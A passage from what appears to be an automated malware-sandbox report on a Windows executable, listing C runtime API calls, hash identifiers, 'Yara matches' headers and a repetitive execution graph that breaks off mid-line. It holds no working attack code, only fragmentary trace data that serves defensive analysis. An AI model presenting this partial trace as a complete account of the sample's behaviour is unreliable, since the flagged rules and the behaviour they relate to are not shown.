                                                                                      • Part of subcall function 0038EB00: GetLastError.KERNEL32(?,00000008,00393006), ref: 0038EB04
                                                                                      • Part of subcall function 0038EB00: SetLastError.KERNEL32(00000000,00000000,00000002,000000FF), ref: 0038EBA6
                                                                                    • EnumSystemLocalesW.KERNEL32(003972CA,00000001,00000000,?,-00000050,?,003978FB,00000000,?,?,?,00000055,?), ref: 00397216
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2417226690-0
                                                                                    APIs
                                                                                      • Part of subcall function 0038EB00: GetLastError.KERNEL32(?,00000008,00393006), ref: 0038EB04
                                                                                      • Part of subcall function 0038EB00: SetLastError.KERNEL32(00000000,00000000,00000002,000000FF), ref: 0038EBA6
                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,003974E6,00000000,00000000,?), ref: 00397778
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 3736152602-0
                                                                                    APIs
                                                                                      • Part of subcall function 0038EB00: GetLastError.KERNEL32(?,00000008,00393006), ref: 0038EB04
                                                                                      • Part of subcall function 0038EB00: SetLastError.KERNEL32(00000000,00000000,00000002,000000FF), ref: 0038EBA6
                                                                                    • EnumSystemLocalesW.KERNEL32(0039751D,00000001,00000000,?,-00000050,?,003978BF,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00397289
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2417226690-0
                                                                                    APIs
                                                                                      • Part of subcall function 0038A722: EnterCriticalSection.KERNEL32(-003DAAA0,?,0038DB07,00000000,003A5540,0000000C,0038DACE,?,?,0038EE1E,?,?,0038EC9E,00000001,00000364,00000000), ref: 0038A731
                                                                                    • EnumSystemLocalesW.KERNEL32(0038EE82,00000001,003A5640,0000000C,0038F2B1,00000000), ref: 0038EEC7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                    • String ID:
                                                                                    • API String ID: 1272433827-0
                                                                                    APIs
                                                                                      • Part of subcall function 0038EB00: GetLastError.KERNEL32(?,00000008,00393006), ref: 0038EB04
                                                                                      • Part of subcall function 0038EB00: SetLastError.KERNEL32(00000000,00000000,00000002,000000FF), ref: 0038EBA6
                                                                                    • EnumSystemLocalesW.KERNEL32(003970B2,00000001,00000000,?,?,0039791D,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00397190
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2417226690-0
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00004F8E,003845F8), ref: 00384F87
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    Similarity
                                                                                    • API ID: HeapProcess
                                                                                    • String ID:
                                                                                    • API String ID: 54951025-0
                                                                                    Similarity
                                                                                    • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 3471368781-0
                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00382093
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0038209D
                                                                                    • int.LIBCPMT ref: 003820B4
                                                                                      • Part of subcall function 003825EC: std::_Lockit::_Lockit.LIBCPMT ref: 003825FD
                                                                                      • Part of subcall function 003825EC: std::_Lockit::~_Lockit.LIBCPMT ref: 00382617
                                                                                    • codecvt.LIBCPMT ref: 003820D7
                                                                                    • std::_Facet_Register.LIBCPMT ref: 003820EE
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0038210E
                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0038211B
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                    • String ID: |,8
                                                                                    • API String ID: 2133458128-3013188374
                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00382128
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00382132
                                                                                    • int.LIBCPMT ref: 00382149
                                                                                      • Part of subcall function 003825EC: std::_Lockit::_Lockit.LIBCPMT ref: 003825FD
                                                                                      • Part of subcall function 003825EC: std::_Lockit::~_Lockit.LIBCPMT ref: 00382617
                                                                                    • ctype.LIBCPMT ref: 0038216C
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00382183
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 003821A3
                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 003821B0
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                    • String ID: |,8
                                                                                    • API String ID: 2958136301-3013188374
                                                                                    APIs
                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 00387DA7
                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 00387EB5
                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00388007
                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00388022
                                                                                    Similarity
                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                    • String ID: csm$csm$csm
                                                                                    • API String ID: 2751267872-393685449
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3907804496
                                                                                    APIs
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00387757
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0038775F
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 003877E8
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00387813
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00387868
                                                                                    Similarity
                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                    • String ID: csm$|,8
                                                                                    • API String ID: 1170836740-3459341545
                                                                                    APIs
                                                                                    • GetCPInfo.KERNEL32(011705D8,011705D8,?,7FFFFFFF,?,00399C39,011705D8,011705D8,?,011705D8,?,?,?,?,011705D8,?), ref: 00399A0F
                                                                                    • __alloca_probe_16.LIBCMT ref: 00399ACA
                                                                                    • __alloca_probe_16.LIBCMT ref: 00399B59
                                                                                    • __freea.LIBCMT ref: 00399BA4
                                                                                    • __freea.LIBCMT ref: 00399BAA
                                                                                    • __freea.LIBCMT ref: 00399BE0
                                                                                    • __freea.LIBCMT ref: 00399BE6
                                                                                    • __freea.LIBCMT ref: 00399BF6
                                                                                    Similarity
                                                                                    • API ID: __freea$__alloca_probe_16$Info
                                                                                    • String ID:
                                                                                    • API String ID: 127012223-0
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0038439F
                                                                                    • __alloca_probe_16.LIBCMT ref: 003843CB
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0038440A
                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00384427
                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00384466
                                                                                    • __alloca_probe_16.LIBCMT ref: 00384483
                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003844C5
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 003844E8
                                                                                    • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                    • String ID:
                                                                                    • API String ID: 2040435927-0
                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00383C92
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00383C9D
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00383D0B
                                                                                      • Part of subcall function 00383DEE: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00383E06
                                                                                    • std::locale::_Setgloballocale.LIBCPMT ref: 00383CB8
                                                                                    • _Yarn.LIBCPMT ref: 00383CCE
                                                                                    • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                    • String ID: |,8
                                                                                    • API String ID: 1088826258-3013188374
                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,ECD46234,?,?,00000000,0039B1C6,000000FF,?,0038C17F,?,?,0038C153,00000016), ref: 0038C224
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0038C236
                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,0039B1C6,000000FF,?,0038C17F,?,?,0038C153,00000016), ref: 0038C258
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll$|,8
                                                                                    • API String ID: 4061214504-3487481140
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,00387911,00385ABF,00384FD2), ref: 00387928
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00387936
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0038794F
                                                                                    • SetLastError.KERNEL32(00000000,00387911,00385ABF,00384FD2), ref: 003879A1
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    APIs
                                                                                    • API ID: AdjustPointer
                                                                                    • String ID: |,8
                                                                                    • API String ID: 1740715915-3013188374
                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00382331
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0038233E
                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0038237B
                                                                                      • Part of subcall function 00383D89: _Yarn.LIBCPMT ref: 00383DA8
                                                                                      • Part of subcall function 00383D89: _Yarn.LIBCPMT ref: 00383DCC
                                                                                    • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                    • String ID: bad locale name
                                                                                    • API String ID: 482894088-1405518554
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00388A13,00000000,?,003DAA14,?,?,?,00388BB6,00000004,InitializeCriticalSectionEx,0039EB88,InitializeCriticalSectionEx), ref: 00388A6F
                                                                                    • GetLastError.KERNEL32(?,00388A13,00000000,?,003DAA14,?,?,?,00388BB6,00000004,InitializeCriticalSectionEx,0039EB88,InitializeCriticalSectionEx,00000000,?,0038896D), ref: 00388A79
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00388AA1
                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                    • String ID: api-ms-
                                                                                    • API String ID: 3177248105-2084034818
                                                                                    APIs
                                                                                    • GetConsoleOutputCP.KERNEL32(ECD46234,00000000,00000000,00000000), ref: 0038FCA1
                                                                                      • Part of subcall function 00393CA4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00392C36,?,00000000,-00000008), ref: 00393D50
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0038FEFC
                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0038FF44
                                                                                    • GetLastError.KERNEL32 ref: 0038FFE7
                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                    • String ID:
                                                                                    • API String ID: 2112829910-0
                                                                                    APIs
                                                                                      • Part of subcall function 00393CA4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00392C36,?,00000000,-00000008), ref: 00393D50
                                                                                    • GetLastError.KERNEL32 ref: 00394124
                                                                                    • __dosmaperr.LIBCMT ref: 0039412B
                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 00394165
                                                                                    • __dosmaperr.LIBCMT ref: 0039416C
                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1913693674-0
                                                                                    • Opcode ID: 5c34d065f1bc2ee6a364f182cd73a826c9c1d281ad34071a03f9d29febf531b9
                                                                                    • Instruction ID: be40520cfc2e9b505395dba069785002504dcd253e8435e655e8f622440f9aa0
                                                                                    • Opcode Fuzzy Hash: 5c34d065f1bc2ee6a364f182cd73a826c9c1d281ad34071a03f9d29febf531b9
                                                                                    • Instruction Fuzzy Hash: E021FF71600306BFDF23AF668C91D2BB7ADFF50364B118518F9299B200D735EC928BA0
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e7681c8900302c39fb97a2b48944080aba32333d56888253c5796dabb4811ef2
                                                                                    • Instruction ID: 4c0e6d14e40394a996e3fe4f0045ce6bfac087eb336a6853b69e4cf76e338781
                                                                                    • Opcode Fuzzy Hash: e7681c8900302c39fb97a2b48944080aba32333d56888253c5796dabb4811ef2
                                                                                    • Instruction Fuzzy Hash: 7321A131600307AFDB22BF628C8297AF7ADFF453A4B168599F914DB652D731EC018760
                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0039505E
                                                                                      • Part of subcall function 00393CA4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00392C36,?,00000000,-00000008), ref: 00393D50
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00395096
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003950B6
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 158306478-0
                                                                                    • Opcode ID: 998c9077786691d34d7ef4dc41d7aaf8ebe2590f2eb54d5f3d5a5679942157a1
                                                                                    • Instruction ID: b2bafab0ebe7afd3a0dc2e109c650e60bb768d14ee15464cb73211ae308064c7
                                                                                    • Opcode Fuzzy Hash: 998c9077786691d34d7ef4dc41d7aaf8ebe2590f2eb54d5f3d5a5679942157a1
                                                                                    • Instruction Fuzzy Hash: 8811D6B3501E167FBF2327759C8AD7F699CDE89394B500015F901D6201EE25DE4047B5
                                                                                    APIs
                                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00398281,00000000,00000001,00000000,00000000,?,0039003B,00000000,00000000,00000000), ref: 0039949C
                                                                                    • GetLastError.KERNEL32(?,00398281,00000000,00000001,00000000,00000000,?,0039003B,00000000,00000000,00000000,00000000,00000000,?,003905C2,00000000), ref: 003994A8
                                                                                      • Part of subcall function 0039946E: CloseHandle.KERNEL32(FFFFFFFE,003994B8,?,00398281,00000000,00000001,00000000,00000000,?,0039003B,00000000,00000000,00000000,00000000,00000000), ref: 0039947E
                                                                                    • ___initconout.LIBCMT ref: 003994B8
                                                                                      • Part of subcall function 00399430: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0039945F,0039826E,00000000,?,0039003B,00000000,00000000,00000000,00000000), ref: 00399443
                                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00398281,00000000,00000001,00000000,00000000,?,0039003B,00000000,00000000,00000000,00000000), ref: 003994CD
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                    • String ID:
                                                                                    • API String ID: 2744216297-0
                                                                                    • Opcode ID: b7538f206e0de8cb8e9112ae2c79a87b2fa6cd4533409fc1ae1533b8709d91c4
                                                                                    • Instruction ID: 3cb90ce461dc3991c0d08e3d06949e4c63c8a4f380cdf6953c2049383b4a08f0
                                                                                    • Opcode Fuzzy Hash: b7538f206e0de8cb8e9112ae2c79a87b2fa6cd4533409fc1ae1533b8709d91c4
                                                                                    • Instruction Fuzzy Hash: 39F03037500154BBCF236FD6DC09A8E3F6AFB493B1F014016FA1995630CA329D21DB90
                                                                                    APIs
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog3_catch_strlen
                                                                                    • String ID: Madino Mino
                                                                                    • API String ID: 3133806014-1963490786
                                                                                    • Opcode ID: 70b58635e34c3b055d7ee529e9029ee1cd09affc81cd629c71d8bef29cfea1d3
                                                                                    • Instruction ID: 2a78dea11b227770c7ad5bfea82d0032a674f5754ce51ded153d13d349592305
                                                                                    • Opcode Fuzzy Hash: 70b58635e34c3b055d7ee529e9029ee1cd09affc81cd629c71d8bef29cfea1d3
                                                                                    • Instruction Fuzzy Hash: 55418275A007148FCB17EBA8D98586CB7FABB49720F29429AE0249B3D1C7719C83CB51
                                                                                    APIs
                                                                                    • EncodePointer.KERNEL32(00000000,?), ref: 00388052
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EncodePointer
                                                                                    • String ID: MOC$RCC
                                                                                    • API String ID: 2118026453-2084237596
                                                                                    • Opcode ID: 384ee6987fbe95c40b5ace58c5f5f0423187b06f2f7b15d393f4a642ae959e41
                                                                                    • Instruction ID: 09f29906726cda34329f39fba9199c8587ae27aaa955fab33f63d8610f7b042b
                                                                                    • Opcode Fuzzy Hash: 384ee6987fbe95c40b5ace58c5f5f0423187b06f2f7b15d393f4a642ae959e41
                                                                                    • Instruction Fuzzy Hash: CB416C72900209AFCF16EF94CD85AEEBBB6FF48300F558099FA14A7211DB359A52DB50
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00383D24
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00383D80
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                    • String ID: |,8
                                                                                    • API String ID: 593203224-3013188374
                                                                                    • Opcode ID: 427fd564facc3b91d7071efc8cb984484f212e07cc440adbc1ad71b78d5216f5
                                                                                    • Instruction ID: 1b27caec86f79a6795bf2276035cd1afff3da05c0a0fdc66c436b525c5878b45
                                                                                    • Opcode Fuzzy Hash: 427fd564facc3b91d7071efc8cb984484f212e07cc440adbc1ad71b78d5216f5
                                                                                    • Instruction Fuzzy Hash: 99015A35600615AFCB06EF19C895EAD7BB9EF84B50B1500DAE8019F3B1EB70EE44CB91
                                                                                    APIs
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 0038F470
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                    • String ID: InitializeCriticalSectionEx$|,8
                                                                                    • API String ID: 2593887523-2417945496
                                                                                    • Opcode ID: 5cec2bcc082e754236bc401d11a0323f89eee34992f501de9c221e6611abf33e
                                                                                    • Instruction ID: 09bd04772ed0aa080fdffa3bdd74f928c24069a3625e39e8c59380f5bd822921
                                                                                    • Opcode Fuzzy Hash: 5cec2bcc082e754236bc401d11a0323f89eee34992f501de9c221e6611abf33e
                                                                                    • Instruction Fuzzy Hash: EFE01232580318BBDF132F51DC0AEDE7F15EB447A1F008462F91956160D6B2996197D0
                                                                                    APIs
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Alloc
                                                                                    • String ID: FlsAlloc$|,8
                                                                                    • API String ID: 2773662609-2771951685
                                                                                    • Opcode ID: b99e38411c9ac1f99dabe77ab18d52c33383cc2521b81f810c78552f1a39371a
                                                                                    • Instruction ID: 9ec5624506b9d39264892e2fcf7199658742d62751dcf44a6286479edddd0a8b
                                                                                    • Opcode Fuzzy Hash: b99e38411c9ac1f99dabe77ab18d52c33383cc2521b81f810c78552f1a39371a
                                                                                    • Instruction Fuzzy Hash: 4BE0C236680324BBCA2332A19C0BEEDB918DB45B61F040471FD056625199A2481087D5

                                                                                    Execution Graph

                                                                                    Execution Coverage:5.7%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:11.9%
                                                                                    Total number of Nodes:2000
                                                                                    Total number of Limit Nodes:40
60476 4028a3 60475->60476 60477 4024d7 9 API calls 60476->60477 60478 4028b4 60477->60478 60479 4024d7 9 API calls 60478->60479 60480 4028c5 60479->60480 60481 4024d7 9 API calls 60480->60481 60482 4028d6 60481->60482 60483 4024d7 9 API calls 60482->60483 60484 4028e7 60483->60484 60485 4024d7 9 API calls 60484->60485 60486 4028f8 60485->60486 60487 4024d7 9 API calls 60486->60487 60488 402909 60487->60488 60489 4024d7 9 API calls 60488->60489 60490 40291a 60489->60490 60491 4024d7 9 API calls 60490->60491 60492 40292b 60491->60492 60493 4024d7 9 API calls 60492->60493 60494 40293c 60493->60494 60495 4024d7 9 API calls 60494->60495 60496 40294d 60495->60496 60497 4024d7 9 API calls 60496->60497 60498 40295e 60497->60498 60499 4024d7 9 API calls 60498->60499 60500 40296f 60499->60500 60501 4024d7 9 API calls 60500->60501 60502 402980 60501->60502 60503 4024d7 9 API calls 60502->60503 60504 402991 60503->60504 60505 4024d7 9 API calls 60504->60505 60506 4029a2 60505->60506 60507 4024d7 9 API calls 60506->60507 60508 4029b3 60507->60508 60509 4024d7 9 API calls 60508->60509 60510 4029c4 60509->60510 60511 4024d7 9 API calls 60510->60511 60512 4029d5 60511->60512 60513 4024d7 9 API calls 60512->60513 60514 4029e6 60513->60514 60515 4024d7 9 API calls 60514->60515 60516 4029f7 60515->60516 60517 4024d7 9 API calls 60516->60517 60518 402a08 60517->60518 60519 4024d7 9 API calls 60518->60519 60520 402a19 60519->60520 60521 4024d7 9 API calls 60520->60521 60522 402a2a 60521->60522 60523 4024d7 9 API calls 60522->60523 60524 402a3b 60523->60524 60525 4024d7 9 API calls 60524->60525 60526 402a4c 60525->60526 60527 4024d7 9 API calls 60526->60527 60528 402a5d 60527->60528 60529 4024d7 9 API calls 60528->60529 60530 402a6e 60529->60530 60531 4024d7 9 API calls 60530->60531 60532 402a7f 60531->60532 60533 4024d7 9 API calls 60532->60533 60534 402a90 60533->60534 60535 4024d7 9 API calls 60534->60535 60536 402aa1 60535->60536 60537 4024d7 9 API calls 60536->60537 60538 402ab2 
60537->60538 60539 4024d7 9 API calls 60538->60539 60540 402ac3 60539->60540 60541 4024d7 9 API calls 60540->60541 60542 402ad4 60541->60542 60543 4024d7 9 API calls 60542->60543 60544 402ae5 60543->60544 60545 4024d7 9 API calls 60544->60545 60546 402af6 60545->60546 60547 4024d7 9 API calls 60546->60547 60548 402b07 60547->60548 60549 4024d7 9 API calls 60548->60549 60550 402b18 60549->60550 60551 4024d7 9 API calls 60550->60551 60552 402b29 60551->60552 60553 4024d7 9 API calls 60552->60553 60554 402b3a 60553->60554 60555 4024d7 9 API calls 60554->60555 60556 402b4b 60555->60556 60557 4024d7 9 API calls 60556->60557 60558 402b5c 60557->60558 60559 4024d7 9 API calls 60558->60559 60560 402b6d 60559->60560 60561 4024d7 9 API calls 60560->60561 60562 402b7e 60561->60562 60563 4024d7 9 API calls 60562->60563 60564 402b8f 60563->60564 60565 4024d7 9 API calls 60564->60565 60566 402ba0 60565->60566 60567 4024d7 9 API calls 60566->60567 60568 402bb1 60567->60568 60569 4024d7 9 API calls 60568->60569 60570 402bc2 60569->60570 60571 4024d7 9 API calls 60570->60571 60572 402bd3 60571->60572 60573 4024d7 9 API calls 60572->60573 60574 402be4 60573->60574 60575 4024d7 9 API calls 60574->60575 60576 402bf5 60575->60576 60577 4024d7 9 API calls 60576->60577 60578 402c06 60577->60578 60579 4024d7 9 API calls 60578->60579 60580 402c17 60579->60580 60581 4024d7 9 API calls 60580->60581 60582 402c28 60581->60582 60583 4024d7 9 API calls 60582->60583 60584 402c39 60583->60584 60585 4024d7 9 API calls 60584->60585 60586 402c4a 60585->60586 60587 4024d7 9 API calls 60586->60587 60588 402c5b 60587->60588 60589 4024d7 9 API calls 60588->60589 60590 402c6c 60589->60590 60591 4024d7 9 API calls 60590->60591 60592 402c7d 60591->60592 60593 4024d7 9 API calls 60592->60593 60594 402c8e 60593->60594 60595 4024d7 9 API calls 60594->60595 60596 402c9f 60595->60596 60597 4024d7 9 API calls 60596->60597 60598 402cb0 60597->60598 60599 4024d7 9 API calls 60598->60599 60600 402cc1 60599->60600 
60601 4024d7 9 API calls 60600->60601 60602 402cd2 60601->60602 60603 4024d7 9 API calls 60602->60603 60604 402ce3 60603->60604 60605 4024d7 9 API calls 60604->60605 60606 402cf4 60605->60606 60607 4024d7 9 API calls 60606->60607 60608 402d05 60607->60608 60609 4024d7 9 API calls 60608->60609 60610 402d16 60609->60610 60611 4024d7 9 API calls 60610->60611 60612 402d27 60611->60612 60613 4024d7 9 API calls 60612->60613 60614 402d38 60613->60614 60615 4024d7 9 API calls 60614->60615 60616 402d49 60615->60616 60617 4024d7 9 API calls 60616->60617 60618 402d5a 60617->60618 60619 4024d7 9 API calls 60618->60619 60620 402d6b 60619->60620 60621 4024d7 9 API calls 60620->60621 60622 402d7c 60621->60622 60623 4024d7 9 API calls 60622->60623 60624 402d8d 60623->60624 60625 4024d7 9 API calls 60624->60625 60626 402d9e 60625->60626 60627 4024d7 9 API calls 60626->60627 60628 402daf 60627->60628 60629 4024d7 9 API calls 60628->60629 60630 402dc0 60629->60630 60631 4024d7 9 API calls 60630->60631 60632 402dd1 60631->60632 60633 4024d7 9 API calls 60632->60633 60634 402de2 60633->60634 60635 4024d7 9 API calls 60634->60635 60636 402df3 60635->60636 60637 4024d7 9 API calls 60636->60637 60638 402e04 60637->60638 60639 4024d7 9 API calls 60638->60639 60640 402e15 60639->60640 60641 4024d7 9 API calls 60640->60641 60642 402e26 60641->60642 60643 4024d7 9 API calls 60642->60643 60644 402e37 60643->60644 60645 4024d7 9 API calls 60644->60645 60646 402e48 60645->60646 60647 4024d7 9 API calls 60646->60647 60648 402e59 60647->60648 60649 4024d7 9 API calls 60648->60649 60650 402e6a 60649->60650 60651 4024d7 9 API calls 60650->60651 60652 402e7b 60651->60652 60653 4024d7 9 API calls 60652->60653 60654 402e8c 60653->60654 60655 4024d7 9 API calls 60654->60655 60656 402e9d 60655->60656 60657 4024d7 9 API calls 60656->60657 60658 402eae 60657->60658 60659 4024d7 9 API calls 60658->60659 60660 402ebf 60659->60660 60661 4024d7 9 API calls 60660->60661 60662 402ed0 60661->60662 60663 4024d7 9 
API calls 60662->60663 60664 402ee1 60663->60664 60665 4024d7 9 API calls 60664->60665 60666 402ef2 60665->60666 60667 4024d7 9 API calls 60666->60667 60668 402f03 60667->60668 60669 4024d7 9 API calls 60668->60669 60670 402f14 60669->60670 60671 4024d7 9 API calls 60670->60671 60672 402f25 60671->60672 60673 4024d7 9 API calls 60672->60673 60674 402f36 60673->60674 60675 4024d7 9 API calls 60674->60675 60676 402f47 60675->60676 60677 4024d7 9 API calls 60676->60677 60678 402f58 60677->60678 60679 4024d7 9 API calls 60678->60679 60680 402f69 60679->60680 60681 4024d7 9 API calls 60680->60681 60682 402f7a 60681->60682 60683 4024d7 9 API calls 60682->60683 60684 402f8b 60683->60684 60685 4024d7 9 API calls 60684->60685 60686 402f9c 60685->60686 60687 4024d7 9 API calls 60686->60687 60688 402fad 60687->60688 60689 4024d7 9 API calls 60688->60689 60690 402fbe 60689->60690 60691 4024d7 9 API calls 60690->60691 60692 402fcf 60691->60692 60693 4024d7 9 API calls 60692->60693 60694 402fe0 60693->60694 60695 4024d7 9 API calls 60694->60695 60696 402ff1 60695->60696 60697 4024d7 9 API calls 60696->60697 60698 403002 60697->60698 60699 4024d7 9 API calls 60698->60699 60700 403013 60699->60700 60701 4024d7 9 API calls 60700->60701 60702 403024 60701->60702 60703 4024d7 9 API calls 60702->60703 60704 403035 60703->60704 60705 4024d7 9 API calls 60704->60705 60706 403046 60705->60706 60707 4024d7 9 API calls 60706->60707 60708 403057 60707->60708 60709 4024d7 9 API calls 60708->60709 60710 403068 60709->60710 60711 4024d7 9 API calls 60710->60711 60712 403079 60711->60712 60713 4024d7 9 API calls 60712->60713 60714 40308a 60713->60714 60715 4024d7 9 API calls 60714->60715 60716 40309b 60715->60716 60717 4024d7 9 API calls 60716->60717 60718 4030ac 60717->60718 60719 4024d7 9 API calls 60718->60719 60720 4030bd 60719->60720 60721 4024d7 9 API calls 60720->60721 60722 4030ce 60721->60722 60723 4024d7 9 API calls 60722->60723 60724 4030df 60723->60724 60725 4024d7 9 API calls 
